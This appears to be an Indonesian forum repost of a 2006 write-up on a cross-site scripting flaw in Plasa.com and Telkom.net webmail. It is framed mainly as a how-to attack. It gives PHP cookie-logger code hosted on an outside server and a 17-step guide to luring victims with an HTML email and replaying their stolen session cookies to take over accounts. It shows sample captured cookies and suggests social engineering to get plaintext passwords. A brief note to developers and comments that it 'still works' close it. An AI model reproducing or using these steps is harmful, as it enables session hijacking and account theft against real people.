Plasa.com adalah sebuah website yang menyediakan cukup banyak layanan, dan sepertinya merupakan sebuah affiliates inti Telkom.net (PT. Telekomunikasi Indonesia). Walaupun keduanya diketahui sebagai website besar, yang juga dipercaya memiliki security yang bisa dikatakan baik (Mengingat mereka adalah perusahaan komunikasi terbesar Indonesia), kenyataan ternyata berbicara lain.
Terhitung pada hari ini (17 October 2006), Th0R bersama dengan SATE (Security Advisory TEam), telah menemukan beberapa kebocoran yang cukup signifikan dalam keamanan pada kedua website tersebut. Pada kesempatan kali ini, kita akan coba membahas mengenai kebocoran yang ada pada website mereka ..
Boleh donk sesekali beralih ke Telkom, setelah bosan dengan Yahoo ..
Mengenal Kebocoran nya
Memang baik bagi telkom maupun plasa.com untuk membuat fitur HTML lgsg pada email mereka, lagipula mereka memang melakukan pengamanan pada penggunaan HTML di inbox mereka sendiri, dengan melakukan filtering beberapa codes yang ada ..
Namun, sesuai dengan legenda yang telah sering terhembuskan oleh angin, XSS (Cross Site Scripting), ternyata memang benar adalah sebuah serangan yang paling mengerikan yang pernah ada. Walaupun sudah di filter sedemikian rupa, perusahaan raksasa di Indonesia (Telkom), ternyata masih memiliki fungsi Human Error, yang membuat mereka lupa melakukan filtering pada beberapa fungsi lain yang bisa dikatakan memang tidak begitu BISA untuk di execute ..
Exploit & PoC
Apabila kalian login masuk ke dalam WebMail mereka, baik telkom.net maupun plasa.com ternyata mereka masuk ke dalam satu server yang serupa, dan tentunya segala sesuatu nya juga bisa dikatakan serupa .. Sehingga KEBOCORANNYA pun serupa .. Hehehe ..
Yang membuat mereka bocor adalah penggunaan HTML nya ..
Dimana apabila kalian melakukan sending email yang berisikan:
Dan mengirimkannya dengan modul HTML seperti yang disediakan oleh pihak mereka sendiri di webmailnya ..
Maka setiap orang yang membuka email mereka dan melewatkan Crusor keatas email tersebut, cookies nya akan ter-record melalui c.php yang telah saya pasangkan ..
C.php nya sendiri memiliki code berikut ini:
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
'); fclose($fp); ?>
Penggunaan Exploit
1. Copy code C.php diatas ..
2. Paste dalam notepad ..
3. Lakukan 'save as' ..
4. Simpan dengan nama c.php .. (Atau nama apa saja dengan format:
.php) 5. Setelah itu, buatlah sebuah text file kosong dengan nama cookies.txt 6. Hostingkan ke 2 nya dalam sebuah hosting yang mengijinkan PHP codes .. (Contoh http://www.byethost.com)
7. Lalu copy lah code yang 1 lagi:
8. Ubah http://shinigami.byethost32.com/c.php menjadi alamat tempat kamu menaruhkan C.php milik kamu ..
9. Paste kan code diatas ke dalam email ..
10. Set pengiriman dengan menggunakan modul HTML ..
11. Tunggu lah target anda melakukan checking email ..
12. Check lah kalau kalau ada logged cookies di cookies.txt anda yang telah terhostingkan ..
13. Dan apabila ada muncul yang kira kira seperti ini:
206.222.15.234 :: 10/17/2006 2:49:05 am
http://mail1.plasa.com/Session/227502-UPcQoxKIVTIeAXZisu91-kmbcuwc/Message.wssp?Mailbox=INBOX&MSG=7&PrintVersion=& :: plasaUserID=th0r; plasaFullName=Rex Carlton; plasaUniqId=8d18f0e0e0e78f5816095b36abad73b0; validUser=734c2b0266483d6540855081d8ed7e15
Artinya target anda telah membuka email jebakan anda ..
14. Pergilah login ke dalam plasa.com / telkom.net milik kalian sendiri ..
15. Lakukan cookie editing, dan mengganti plasaUserID, plasaFullName, plasaUniqID, dan ValidUser sesuai dengan yang anda dapatkan dari target anda ..
16. Refresh page ..
17. Viola .. !! U now logged in as target ..
Penerapan lebih lanjut
Seperti yang kita ketahui, sebagian orang mgkn menggunakan password pada beberapa account penting mereka dengan password yang sama .. So, untuk mendapatkan plain-text password, kalian bisa melakukan sedikit Social Engineering, dengan melakukan lupa pas, pada Friendster.com misalnya, atau web lain, yang nantinya membuat plain-text password mereka terkirim ke alamat email mereka di plasa.com atau telkom.net itu sendiri ..
Atau dengan cara lain ..
Itu gak sulit ..
Ternyata, plasa.com dan telkom.net memberikan Semua Informasi penting dan tidak penting yang tercantum pada profile anda, tanpa encryption method, lgsg pada bagian Edit Profile .. Hal ini membuat para penyerang mampu mendapatkan Secret Question dan Answer nya, lalu memungkinkan mereka melakukan Lupa Password ..
Ridiculous isnt it?! Hehehe~~
Catatan Penting
- Perlu diingat bahwa ini bukanlah satu2nya vulnerabilities yang ada pada plasa.com ataupun telkom.net
- Penggunaan HTML pada body email juga bukan merupakan satu2nya kelemahan
Catatan Untuk Developer
- Mohon agar Telkom.net dan Plasa.com melakukan re-check terhadap keamanan mereka, dan melakukan filtering yang lebih terhadap penggunaan HTML di dalam email mereka ..
- Hilangkan segala jenis XSS yang bekerja pada website mereka (Sejauh ini terdapat puluhan XSS working on their site).
terakhir masih bisa...Coba lage
gw dah lama gak coba
Subject: HAcking TElkomnet n PLasa telkom 
Fri Feb 15, 2008 6:26 pm
